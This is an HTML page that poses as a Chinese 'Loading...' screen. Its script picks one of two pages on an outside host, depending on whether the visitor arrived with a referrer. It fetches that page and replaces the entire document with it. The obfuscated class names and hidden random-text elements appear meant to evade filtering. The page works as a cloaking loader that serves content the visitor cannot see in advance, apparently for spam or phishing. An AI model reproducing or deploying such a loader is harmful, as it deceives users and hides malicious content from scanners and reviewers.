<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AdR4sVr5K {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AdR4sVr5K .pzlSPBoD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AdR4sVr5K .content {
            line-height: 50px;
            text-align: center
        }

        .AdR4sVr5K .img {
            width: 100%
        }

        .AdR4sVr5K .pW8iRlBS2R {
            text-align: center
        }

        .AdR4sVr5K .pW8iRlBS2R span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AdR4sVr5K .pW8iRlBS2R span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AdR4sVr5K .pW8iRlBS2R span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AdR4sVr5K .pW8iRlBS2R span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AdR4sVr5K .pW8iRlBS2R span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AdR4sVr5K .pW8iRlBS2R span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AdR4sVr5K .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function WElzX6P0C(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ADrK66 = WElzX6P0C('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ADrK66 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ADrK66 +".html?a=share";
		}
		
        VXbsUSG=url+"#"+new Date().getTime();
        VXbsUSG && function() {
            $.get(VXbsUSG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >ftbwsW9oDYLDOdpALe2yCIi7pJRSTxmq96YuP8ABz5zOCY</ul>
<li style='display:none' >aP7qLYSXnybI2tfiOg7B9cHiuFDyhh2K7qH7NmYsKSXUS7t52ptY293TeDUo4G1Ki4KCrMjHntEP19HyoGJXnconfom2bbsPER</li>
<div style='display:none'>WXNWnrTVRwVwcEE5iDwDWxEOzKj3oB28Fceso5Qn86dXUU5XoohbBZaI5d7HUEUkHz8FjVcJpjf4woDhxVRuP6Go8</div>
<div style='display:none'>WXNWnrTVRwVwcEE5iDwDWxEOzKj3oB28Fceso5Qn86dXUU5XoohbBZaI5d7HUEUkHz8FjVcJpjf4woDhxVRuP6Go8</div><div class="AdR4sVr5K">
    <div class="pzlSPBoD">
        <div class="pW8iRlBS2R">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>cyae5NuHWybqdFhlqMQaK4GunU2tf3b38qNBtDRhPD9ORzJT1KwJ32znzMYDmQjuM5SDR9dWc7Je0kGSfXFjduWlePBxzrIIUp</a>
<li style='display:none' >t3qF8XTpLQZ8IOAuBifOITKFfVoZSIwbC5u4EkQdxsdo6b1549Gygscelv7DpdAGVc7QebuCSe5hFs0WM6Lh8p7PODAXWIKH0NH</li>
<span style='display:none'>hufo0lrsjvTHdWgpGcb1</span>
<p  style='display:none'>GYd0SNYpDeSSHfEBHL1lAAO276dUNtv4igGu5reaDqSfnXhcb1bVLTRMbYOVh5Xx1</p>
<div style='display:none'>RExlpQFygTHeB4vAoQ4OjIL3iYTxNsArxvcpKOfltzHDgp2bnpYlwbuIjATbyvhQPmnLLsLMCY14numg4xvuHPQ0wtxEHokhUbt</div>
<h1 style='display:none' >If0B7BdLOqzQ63tp1</h1>
<img  src='' style='display:none'></body>
</html>